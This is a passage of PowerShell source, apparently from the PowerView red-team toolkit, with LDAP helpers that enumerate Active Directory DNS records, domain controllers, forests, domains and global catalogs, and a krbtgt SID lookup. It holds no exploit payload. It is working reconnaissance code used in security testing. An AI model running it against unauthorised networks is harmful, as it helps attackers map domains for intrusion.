[OutputType('System.DirectoryServices.DirectorySearcher')]
[CmdletBinding()]
Param(
[Parameter(ValueFromPipeline = $True)]
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[ValidateNotNullOrEmpty()]
[String[]]
$Properties,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[String]
$SearchBasePrefix,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit = 120,
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
[String]
$SecurityMasks,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
PROCESS {
if ($PSBoundParameters['Domain']) {
$TargetDomain = $Domain
}
else {
# if not -Domain is specified, retrieve the current domain name
if ($PSBoundParameters['Credential']) {
$DomainObject = Get-Domain -Credential $Credential
}
else {
$DomainObject = Get-Domain
}
$TargetDomain = $DomainObject.Name
}
if (-not $PSBoundParameters['Server']) {
# if there's not a specified server to bind to, try to pull the current domain PDC
try {
if ($DomainObject) {
$BindServer = $DomainObject.PdcRoleOwner.Name
}
elseif ($PSBoundParameters['Credential']) {
$BindServer = ((Get-Domain -Credential $Credential).PdcRoleOwner).Name
}
else {
$BindServer = ((Get-Domain).PdcRoleOwner).Name
}
}
catch {
throw "[Get-DomainSearcher] Error in retrieving PDC for current domain: $_"
}
}
else {
$BindServer = $Server
}
$SearchString = 'LDAP://'
if ($BindServer -and ($BindServer.Trim() -ne '')) {
$SearchString += $BindServer
if ($TargetDomain) {
$SearchString += '/'
}
}
if ($PSBoundParameters['SearchBasePrefix']) {
$SearchString += $SearchBasePrefix + ','
}
if ($PSBoundParameters['SearchBase']) {
if ($SearchBase -Match '^GC://') {
# if we're searching the global catalog, get the path in the right format
$DN = $SearchBase.ToUpper().Trim('/')
$SearchString = ''
}
else {
if ($SearchBase -match '^LDAP://') {
if ($SearchBase -match "LDAP://.+/.+") {
$SearchString = ''
$DN = $SearchBase
}
else {
$DN = $SearchBase.SubString(7)
}
}
else {
$DN = $SearchBase
}
}
}
else {
# transform the target domain name into a distinguishedName if an ADS search base is not specified
if ($TargetDomain -and ($TargetDomain.Trim() -ne '')) {
$DN = "DC=$($TargetDomain.Replace('.', ',DC='))"
}
}
$SearchString += $DN
Write-Verbose "[Get-DomainSearcher] search string: $SearchString"
if ($Credential -ne [Management.Automation.PSCredential]::Empty) {
Write-Verbose "[Get-DomainSearcher] Using alternate credentials for LDAP connection"
# bind to the inital search object using alternate credentials
$DomainObject = New-Object DirectoryServices.DirectoryEntry($SearchString, $Credential.UserName, $Credential.GetNetworkCredential().Password)
$Searcher = New-Object System.DirectoryServices.DirectorySearcher($DomainObject)
}
else {
# bind to the inital object using the current credentials
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
}
$Searcher.PageSize = $ResultPageSize
$Searcher.SearchScope = $SearchScope
$Searcher.CacheResults = $False
$Searcher.ReferralChasing = [System.DirectoryServices.ReferralChasingOption]::All
if ($PSBoundParameters['ServerTimeLimit']) {
$Searcher.ServerTimeLimit = $ServerTimeLimit
}
if ($PSBoundParameters['Tombstone']) {
$Searcher.Tombstone = $True
}
if ($PSBoundParameters['LDAPFilter']) {
$Searcher.filter = $LDAPFilter
}
if ($PSBoundParameters['SecurityMasks']) {
$Searcher.SecurityMasks = Switch ($SecurityMasks) {
'Dacl' { [System.DirectoryServices.SecurityMasks]::Dacl }
'Group' { [System.DirectoryServices.SecurityMasks]::Group }
'None' { [System.DirectoryServices.SecurityMasks]::None }
'Owner' { [System.DirectoryServices.SecurityMasks]::Owner }
'Sacl' { [System.DirectoryServices.SecurityMasks]::Sacl }
}
}
if ($PSBoundParameters['Properties']) {
# handle an array of properties to load w/ the possibility of comma-separated strings
$PropertiesToLoad = $Properties| ForEach-Object { $_.Split(',') }
$Null = $Searcher.PropertiesToLoad.AddRange(($PropertiesToLoad))
}
$Searcher
}
}
function Convert-DNSRecord {
<#
.SYNOPSIS
Helpers that decodes a binary DNS record blob.
Author: Michael B. Smith, Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
.DESCRIPTION
Decodes a binary blob representing an Active Directory DNS entry.
Used by Get-DomainDNSRecord.
Adapted/ported from Michael B. Smith's code at https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1
.PARAMETER DNSRecord
A byte array representing the DNS record.
.OUTPUTS
System.Management.Automation.PSCustomObject
Outputs custom PSObjects with detailed information about the DNS record entry.
.LINK
https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1
#>
[OutputType('System.Management.Automation.PSCustomObject')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
[Byte[]]
$DNSRecord
)
BEGIN {
function Get-Name {
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseOutputTypeCorrectly', '')]
[CmdletBinding()]
Param(
[Byte[]]
$Raw
)
[Int]$Length = $Raw[0]
[Int]$Segments = $Raw[1]
[Int]$Index = 2
[String]$Name = ''
while ($Segments-- -gt 0)
{
[Int]$SegmentLength = $Raw[$Index++]
while ($SegmentLength-- -gt 0) {
$Name += [Char]$Raw[$Index++]
}
$Name += "."
}
$Name
}
}
PROCESS {
# $RDataLen = [BitConverter]::ToUInt16($DNSRecord, 0)
$RDataType = [BitConverter]::ToUInt16($DNSRecord, 2)
$UpdatedAtSerial = [BitConverter]::ToUInt32($DNSRecord, 8)
$TTLRaw = $DNSRecord[12..15]
# reverse for big endian
$Null = [array]::Reverse($TTLRaw)
$TTL = [BitConverter]::ToUInt32($TTLRaw, 0)
$Age = [BitConverter]::ToUInt32($DNSRecord, 20)
if ($Age -ne 0) {
$TimeStamp = ((Get-Date -Year 1601 -Month 1 -Day 1 -Hour 0 -Minute 0 -Second 0).AddHours($age)).ToString()
}
else {
$TimeStamp = '[static]'
}
$DNSRecordObject = New-Object PSObject
if ($RDataType -eq 1) {
$IP = "{0}.{1}.{2}.{3}" -f $DNSRecord[24], $DNSRecord[25], $DNSRecord[26], $DNSRecord[27]
$Data = $IP
$DNSRecordObject | Add-Member Noteproperty 'RecordType' 'A'
}
elseif ($RDataType -eq 2) {
$NSName = Get-Name $DNSRecord[24..$DNSRecord.length]
$Data = $NSName
$DNSRecordObject | Add-Member Noteproperty 'RecordType' 'NS'
}
elseif ($RDataType -eq 5) {
$Alias = Get-Name $DNSRecord[24..$DNSRecord.length]
$Data = $Alias
$DNSRecordObject | Add-Member Noteproperty 'RecordType' 'CNAME'
}
elseif ($RDataType -eq 6) {
# TODO: how to implement properly? nested object?
$Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
$DNSRecordObject | Add-Member Noteproperty 'RecordType' 'SOA'
}
elseif ($RDataType -eq 12) {
$Ptr = Get-Name $DNSRecord[24..$DNSRecord.length]
$Data = $Ptr
$DNSRecordObject | Add-Member Noteproperty 'RecordType' 'PTR'
}
elseif ($RDataType -eq 13) {
# TODO: how to implement properly? nested object?
$Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
$DNSRecordObject | Add-Member Noteproperty 'RecordType' 'HINFO'
}
elseif ($RDataType -eq 15) {
# TODO: how to implement properly? nested object?
$Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
$DNSRecordObject | Add-Member Noteproperty 'RecordType' 'MX'
}
elseif ($RDataType -eq 16) {
[string]$TXT = ''
[int]$SegmentLength = $DNSRecord[24]
$Index = 25
while ($SegmentLength-- -gt 0) {
$TXT += [char]$DNSRecord[$index++]
}
$Data = $TXT
$DNSRecordObject | Add-Member Noteproperty 'RecordType' 'TXT'
}
elseif ($RDataType -eq 28) {
# TODO: how to implement properly? nested object?
$Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
$DNSRecordObject | Add-Member Noteproperty 'RecordType' 'AAAA'
}
elseif ($RDataType -eq 33) {
# TODO: how to implement properly? nested object?
$Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
$DNSRecordObject | Add-Member Noteproperty 'RecordType' 'SRV'
}
else {
$Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
$DNSRecordObject | Add-Member Noteproperty 'RecordType' 'UNKNOWN'
}
$DNSRecordObject | Add-Member Noteproperty 'UpdatedAtSerial' $UpdatedAtSerial
$DNSRecordObject | Add-Member Noteproperty 'TTL' $TTL
$DNSRecordObject | Add-Member Noteproperty 'Age' $Age
$DNSRecordObject | Add-Member Noteproperty 'TimeStamp' $TimeStamp
$DNSRecordObject | Add-Member Noteproperty 'Data' $Data
$DNSRecordObject
}
}
function Get-DomainDNSZone {
<#
.SYNOPSIS
Enumerates the Active Directory DNS zones for a given domain.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
.PARAMETER Domain
The domain to query for zones, defaults to the current domain.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to for the search.
.PARAMETER Properties
Specifies the properties of the output object to retrieve from the server.
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER FindOne
Only return one result object.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-DomainDNSZone
Retrieves the DNS zones for the current domain.
.EXAMPLE
Get-DomainDNSZone -Domain dev.testlab.local -Server primary.testlab.local
Retrieves the DNS zones for the dev.testlab.local domain, binding to primary.testlab.local.
.OUTPUTS
PowerView.DNSZone
Outputs custom PSObjects with detailed information about the DNS zone.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.DNSZone')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True)]
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateNotNullOrEmpty()]
[String[]]
$Properties,
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Alias('ReturnOne')]
[Switch]
$FindOne,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
PROCESS {
$SearcherArguments = @{
'LDAPFilter' = '(objectClass=dnsZone)'
}
if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
$DNSSearcher1 = Get-DomainSearcher @SearcherArguments
if ($DNSSearcher1) {
if ($PSBoundParameters['FindOne']) { $Results = $DNSSearcher1.FindOne() }
else { $Results = $DNSSearcher1.FindAll() }
$Results | Where-Object {$_} | ForEach-Object {
$Out = Convert-LDAPProperty -Properties $_.Properties
$Out | Add-Member NoteProperty 'ZoneName' $Out.name
$Out.PSObject.TypeNames.Insert(0, 'PowerView.DNSZone')
$Out
}
if ($Results) {
try { $Results.dispose() }
catch {
Write-Verbose "[Get-DomainDFSShare] Error disposing of the Results object: $_"
}
}
$DNSSearcher1.dispose()
}
$SearcherArguments['SearchBasePrefix'] = 'CN=MicrosoftDNS,DC=DomainDnsZones'
$DNSSearcher2 = Get-DomainSearcher @SearcherArguments
if ($DNSSearcher2) {
try {
if ($PSBoundParameters['FindOne']) { $Results = $DNSSearcher2.FindOne() }
else { $Results = $DNSSearcher2.FindAll() }
$Results | Where-Object {$_} | ForEach-Object {
$Out = Convert-LDAPProperty -Properties $_.Properties
$Out | Add-Member NoteProperty 'ZoneName' $Out.name
$Out.PSObject.TypeNames.Insert(0, 'PowerView.DNSZone')
$Out
}
if ($Results) {
try { $Results.dispose() }
catch {
Write-Verbose "[Get-DomainDNSZone] Error disposing of the Results object: $_"
}
}
}
catch {
Write-Verbose "[Get-DomainDNSZone] Error accessing 'CN=MicrosoftDNS,DC=DomainDnsZones'"
}
$DNSSearcher2.dispose()
}
}
}
function Get-DomainDNSRecord {
<#
.SYNOPSIS
Enumerates the Active Directory DNS records for a given zone.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-DNSRecord
.DESCRIPTION
Given a specific Active Directory DNS zone name, query for all 'dnsNode'
LDAP entries using that zone as the search base. Return all DNS entry results
and use Convert-DNSRecord to try to convert the binary DNS record blobs.
.PARAMETER ZoneName
Specifies the zone to query for records (which can be enumearted with Get-DomainDNSZone).
.PARAMETER Domain
The domain to query for zones, defaults to the current domain.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to for the search.
.PARAMETER Properties
Specifies the properties of the output object to retrieve from the server.
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER FindOne
Only return one result object.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-DomainDNSRecord -ZoneName testlab.local
Retrieve all records for the testlab.local zone.
.EXAMPLE
Get-DomainDNSZone | Get-DomainDNSRecord
Retrieve all records for all zones in the current domain.
.EXAMPLE
Get-DomainDNSZone -Domain dev.testlab.local | Get-DomainDNSRecord -Domain dev.testlab.local
Retrieve all records for all zones in the dev.testlab.local domain.
.OUTPUTS
PowerView.DNSRecord
Outputs custom PSObjects with detailed information about the DNS record entry.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.DNSRecord')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[ValidateNotNullOrEmpty()]
[String]
$ZoneName,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateNotNullOrEmpty()]
[String[]]
$Properties = 'name,distinguishedname,dnsrecord,whencreated,whenchanged',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Alias('ReturnOne')]
[Switch]
$FindOne,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
PROCESS {
$SearcherArguments = @{
'LDAPFilter' = '(objectClass=dnsNode)'
'SearchBasePrefix' = "DC=$($ZoneName),CN=MicrosoftDNS,DC=DomainDnsZones"
}
if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
$DNSSearcher = Get-DomainSearcher @SearcherArguments
if ($DNSSearcher) {
if ($PSBoundParameters['FindOne']) { $Results = $DNSSearcher.FindOne() }
else { $Results = $DNSSearcher.FindAll() }
$Results | Where-Object {$_} | ForEach-Object {
try {
$Out = Convert-LDAPProperty -Properties $_.Properties | Select-Object name,distinguishedname,dnsrecord,whencreated,whenchanged
$Out | Add-Member NoteProperty 'ZoneName' $ZoneName
# convert the record and extract the properties
if ($Out.dnsrecord -is [System.DirectoryServices.ResultPropertyValueCollection]) {
# TODO: handle multiple nested records properly?
$Record = Convert-DNSRecord -DNSRecord $Out.dnsrecord[0]
}
else {
$Record = Convert-DNSRecord -DNSRecord $Out.dnsrecord
}
if ($Record) {
$Record.PSObject.Properties | ForEach-Object {
$Out | Add-Member NoteProperty $_.Name $_.Value
}
}
$Out.PSObject.TypeNames.Insert(0, 'PowerView.DNSRecord')
$Out
}
catch {
Write-Warning "[Get-DomainDNSRecord] Error: $_"
$Out
}
}
if ($Results) {
try { $Results.dispose() }
catch {
Write-Verbose "[Get-DomainDNSRecord] Error disposing of the Results object: $_"
}
}
$DNSSearcher.dispose()
}
}
}
function Get-Domain {
<#
.SYNOPSIS
Returns the domain object for the current (or specified) domain.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
.DESCRIPTION
Returns a System.DirectoryServices.ActiveDirectory.Domain object for the current
domain or the domain specified with -Domain X.
.PARAMETER Domain
Specifies the domain name to query for, defaults to the current domain.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-Domain -Domain testlab.local
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-Domain -Credential $Cred
.OUTPUTS
System.DirectoryServices.ActiveDirectory.Domain
A complex .NET domain object.
.LINK
http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG
#>
[OutputType([System.DirectoryServices.ActiveDirectory.Domain])]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True)]
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
PROCESS {
if ($PSBoundParameters['Credential']) {
Write-Verbose '[Get-Domain] Using alternate credentials for Get-Domain'
if ($PSBoundParameters['Domain']) {
$TargetDomain = $Domain
}
else {
# if no domain is supplied, extract the logon domain from the PSCredential passed
$TargetDomain = $Credential.GetNetworkCredential().Domain
Write-Verbose "[Get-Domain] Extracted domain '$TargetDomain' from -Credential"
}
$DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $TargetDomain, $Credential.UserName, $Credential.GetNetworkCredential().Password)
try {
[System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)
}
catch {
Write-Verbose "[Get-Domain] The specified domain '$TargetDomain' does not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid: $_"
}
}
elseif ($PSBoundParameters['Domain']) {
$DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain)
try {
[System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)
}
catch {
Write-Verbose "[Get-Domain] The specified domain '$Domain' does not exist, could not be contacted, or there isn't an existing trust : $_"
}
}
else {
try {
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
}
catch {
Write-Verbose "[Get-Domain] Error retrieving the current domain: $_"
}
}
}
}
function Get-DomainController {
<#
.SYNOPSIS
Return the domain controllers for the current (or specified) domain.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainComputer, Get-Domain
.DESCRIPTION
Enumerates the domain controllers for the current or specified domain.
By default built in .NET methods are used. The -LDAP switch uses Get-DomainComputer
to search for domain controllers.
.PARAMETER Domain
The domain to query for domain controllers, defaults to the current domain.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER LDAP
Switch. Use LDAP queries to determine the domain controllers instead of built in .NET methods.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-DomainController -Domain 'test.local'
Determine the domain controllers for 'test.local'.
.EXAMPLE
Get-DomainController -Domain 'test.local' -LDAP
Determine the domain controllers for 'test.local' using LDAP queries.
.EXAMPLE
'test.local' | Get-DomainController
Determine the domain controllers for 'test.local'.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainController -Credential $Cred
.OUTPUTS
PowerView.Computer
Outputs custom PSObjects with details about the enumerated domain controller if -LDAP is specified.
System.DirectoryServices.ActiveDirectory.DomainController
If -LDAP isn't specified.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.Computer')]
[OutputType('System.DirectoryServices.ActiveDirectory.DomainController')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True)]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[Switch]
$LDAP,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
PROCESS {
$Arguments = @{}
if ($PSBoundParameters['Domain']) { $Arguments['Domain'] = $Domain }
if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential }
if ($PSBoundParameters['LDAP'] -or $PSBoundParameters['Server']) {
if ($PSBoundParameters['Server']) { $Arguments['Server'] = $Server }
# UAC specification for domain controllers
$Arguments['LDAPFilter'] = '(userAccountControl:1.2.840.113556.1.4.803:=8192)'
Get-DomainComputer @Arguments
}
else {
$FoundDomain = Get-Domain @Arguments
if ($FoundDomain) {
$FoundDomain.DomainControllers
}
}
}
}
function Get-Forest {
<#
.SYNOPSIS
Returns the forest object for the current (or specified) forest.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: ConvertTo-SID
.DESCRIPTION
Returns a System.DirectoryServices.ActiveDirectory.Forest object for the current
forest or the forest specified with -Forest X.
.PARAMETER Forest
The forest name to query for, defaults to the current forest.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target forest.
.EXAMPLE
Get-Forest -Forest external.domain
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-Forest -Credential $Cred
.OUTPUTS
System.Management.Automation.PSCustomObject
Outputs a PSObject containing System.DirectoryServices.ActiveDirectory.Forest in addition
to the forest root domain SID.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('System.Management.Automation.PSCustomObject')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True)]
[ValidateNotNullOrEmpty()]
[String]
$Forest,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
PROCESS {
if ($PSBoundParameters['Credential']) {
Write-Verbose "[Get-Forest] Using alternate credentials for Get-Forest"
if ($PSBoundParameters['Forest']) {
$TargetForest = $Forest
}
else {
# if no domain is supplied, extract the logon domain from the PSCredential passed
$TargetForest = $Credential.GetNetworkCredential().Domain
Write-Verbose "[Get-Forest] Extracted domain '$Forest' from -Credential"
}
$ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $TargetForest, $Credential.UserName, $Credential.GetNetworkCredential().Password)
try {
$ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext)
}
catch {
Write-Verbose "[Get-Forest] The specified forest '$TargetForest' does not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid: $_"
$Null
}
}
elseif ($PSBoundParameters['Forest']) {
$ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $Forest)
try {
$ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext)
}
catch {
Write-Verbose "[Get-Forest] The specified forest '$Forest' does not exist, could not be contacted, or there isn't an existing trust: $_"
return $Null
}
}
else {
# otherwise use the current forest
$ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
}
if ($ForestObject) {
# get the SID of the forest root
if ($PSBoundParameters['Credential']) {
$ForestSid = (Get-DomainUser -Identity "krbtgt" -Domain $ForestObject.RootDomain.Name -Credential $Credential).objectsid
}
else {
$ForestSid = (Get-DomainUser -Identity "krbtgt" -Domain $ForestObject.RootDomain.Name).objectsid
}
$Parts = $ForestSid -Split '-'
$ForestSid = $Parts[0..$($Parts.length-2)] -join '-'
$ForestObject | Add-Member NoteProperty 'RootDomainSid' $ForestSid
$ForestObject
}
}
}
function Get-ForestDomain {
<#
.SYNOPSIS
Return all domains for the current (or specified) forest.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-Forest
.DESCRIPTION
Returns all domains for the current forest or the forest specified
by -Forest X.
.PARAMETER Forest
Specifies the forest name to query for domains.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target forest.
.EXAMPLE
Get-ForestDomain
.EXAMPLE
Get-ForestDomain -Forest external.local
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-ForestDomain -Credential $Cred
.OUTPUTS
System.DirectoryServices.ActiveDirectory.Domain
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('System.DirectoryServices.ActiveDirectory.Domain')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True)]
[ValidateNotNullOrEmpty()]
[String]
$Forest,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
PROCESS {
$Arguments = @{}
if ($PSBoundParameters['Forest']) { $Arguments['Forest'] = $Forest }
if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential }
$ForestObject = Get-Forest @Arguments
if ($ForestObject) {
$ForestObject.Domains
}
}
}
function Get-ForestGlobalCatalog {
<#
.SYNOPSIS
Return all global catalogs for the current (or specified) forest.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-Forest
.DESCRIPTION
Returns all global catalogs for the current forest or the forest specified
by -Forest X by using Get-Forest to retrieve the specified forest object
and the .FindAllGlobalCatalogs() to enumerate the global catalogs.
.PARAMETER Forest
Specifies the forest name to query for global catalogs.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-ForestGlobalCatalog
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-ForestGlobalCatalog -Credential $Cred
.OUTPUTS
System.DirectoryServices.ActiveDirectory.GlobalCatalog
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('System.DirectoryServices.ActiveDirectory.GlobalCatalog')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True)]
[ValidateNotNullOrEmpty()]
[String]
$Forest,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
PROCESS {
$Arguments = @{}
if ($PSBoundParameters['Forest']) { $Arguments['Forest'] = $Forest }
if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential }
$ForestObject = Get-Forest @Arguments
if ($ForestObject) {
$ForestObject.FindAllGlobalCatalogs()
}
}
}
function Get-ForestSchemaClass {
<#
.SYNOPSIS
Helper that returns the Active Directory schema classes for the current
(or specified) forest or returns just the schema class specified by
-ClassName X.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-Forest
.DESCRIPTION
Uses Get-Forest to retrieve the current (or specified) forest. By default,
the .FindAllClasses() method is executed, returning a collection of
[DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass] results.
If "-FindClass X" is specified, the [DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass]
result for the specified class name is returned.
.PARAMETER ClassName
Specifies a ActiveDirectorySchemaClass name in the found schema to return.
.PARAMETER Forest
The forest to query for the schema, defaults to the current forest.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-ForestSchemaClass
Returns all domain schema classes for the current forest.
.EXAMPLE
Get-ForestSchemaClass -Forest dev.testlab.local
Returns all domain schema classes for the external.local forest.
.EXAMPLE
Get-ForestSchemaClass -ClassName user -Forest external.local
Returns the user schema class for the external.local domain.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-ForestSchemaClass -ClassName user -Forest external.local -Credential $Cred
Returns the user schema class for the external.local domain using
the specified alternate credentials.
.OUTPUTS
[DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass]
An ActiveDirectorySchemaClass returned from the found schema.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
